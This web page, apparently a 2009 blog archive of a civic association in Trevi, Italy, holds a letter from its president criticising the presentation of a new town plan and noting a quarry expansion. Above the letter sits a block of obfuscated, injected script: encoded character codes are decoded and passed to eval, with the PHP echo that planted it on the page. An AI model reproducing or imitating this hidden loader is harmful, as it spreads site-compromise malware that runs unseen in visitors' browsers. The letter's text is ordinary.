q4Zq1Zq72Zq4Zq1Zq60Zq5dZq1fZq3eZq5cZq6bZq3aZq66Zq66Zq62Zq60Zq5cZq1fZq1eZq6dZq60Zq6aZq60Zq6bZq5cZq5bZq56Zq6cZq68Zq1eZq20Zq34Zq34Zq2cZq2cZq20Zq72Zq74Zq5cZq63Zq6aZq5cZq72Zq4aZq5cZq6bZq3aZq66Zq66Zq62Zq60Zq5cZq1fZq1eZq6dZq60Zq6aZq60Zq6bZq5cZq5bZq56Zq6cZq68Zq1eZq23Zq17Zq1eZq2cZq2cZq1eZq23Zq17Zq1eZq28Zq1eZq23Zq17Zq1eZq26Zq1eZq20Zq32Zq4Zq1Zq4Zq1Zq70Zq6aZq61Zq5aZq67Zq27Zq30Zq1fZq20Zq32Zq4Zq1Zq74Zq4Zq1Zq74\"[gzr](\"Zq\");}uwo=cpf;uoukoc=[];for(ymg=22-20-2;-ymg 1420!=0;ymg =1){ubtze=ymg;if((0x19==031))uoukoc =pivr.fromCharCode(eval(xcf uwo[1*ubtze]) 0xa-nhmv);}ilqz=eval;if(Math.ceil(5.5)===6)ilqz(uoukoc)}";echo $x;} ?>

Archive for Ottobre, 2009

Presentazione del nuovo Piano Regolatore Generale

admin Ottobre 22nd, 2009

Cari Soci
la presentazione della parte strutturale del nuovo piano regolatore all’assemblea pubblica di sabato scorso (17 ottobre) è stata, per i soci che erano presenti, una grande delusione. Sono stati esposti di una serie di concetti, propositi e principii, molti dei quali belli e da sostenere, ma completemente astratti e presentati in termini così tecnici da essere praticamente incomprensibili ai non addetti ai lavori. Di concreto quasi niente. Sappiamo solo che l’aumento dell’area urbanizzata di Trevi non dovrà superere il 5% - circa cinque milioni di metri cubi, se mi ricordo bene - ma questa cifra si aggiunge all’aumento previsto del vecchio piano regolatore e in parte non ancora realizzato. Sappiamo anche che ci sarà una nuova definizione delle aree - agricole, edificabili, di conservazione ecc - non più A, B, C ma CU, RU, TU e così via.
Incoraggiante comunque l’impostazione del piano. I rappresentanti della società che ha steso il piano parlavano molto dell’importanza di salvaguardare l’ambiente. Parlavano un parco degli olivi per proteggere i pendii olivati, di una riqualificazione di Borgo Trevi, del centro storico, del patrimonio delle acque (il sistema idrico e del Clitunno), e della vecchia Flaminia, ma senza indicare minimamente come questi progetti sarebbero realizzati. Anche della zona archaeologica a Pietrarossa. Vogliono salvaguardare la fascia collinare - ma nessuna parola, per esempio, sul problema della speculazione edilizia già in atto in quella zona. Per sapere qualcosa di più pare che dobbiamo aspettare la presentazione della parte operativa del piano, la quale, mi dicono in Comune, non sarà pronta per altri 4-5 mesi e sarà ancora più “tecnica”!
Al consiglio della Trebis, riunitosi lunedì sera, è stato rilevato - a parte le critiche menzionati qua sopra - che il piano è chiaramente basato su un’indagine conoscitiva errata, che non tiene conto della natura reale nè dell’incremento demografico di Trevi nè dell’esistenza di moltissimi case nuove invendute nel territorio, per non parlare di capannoni inutilizzati. Abbiamo deciso di chiedere una copia del piano da studiare bene per poter prendere una posizione ufficiale. Si vuole organizzare un convegno su questo tema, invitando anche esperti da fuori. I tempi e le modalità sono ancora da decidere.
Un altro tema: è stato concesso l’ampliamento della cava Metelli, nonostante tutti gli infrazioni e gli abusi degli ultimi tempi. Stiamo raccogliendo i documenti in materia per poter intervenire.
Cordiali saluti a tutti
Patricia Clough
Presidente

–>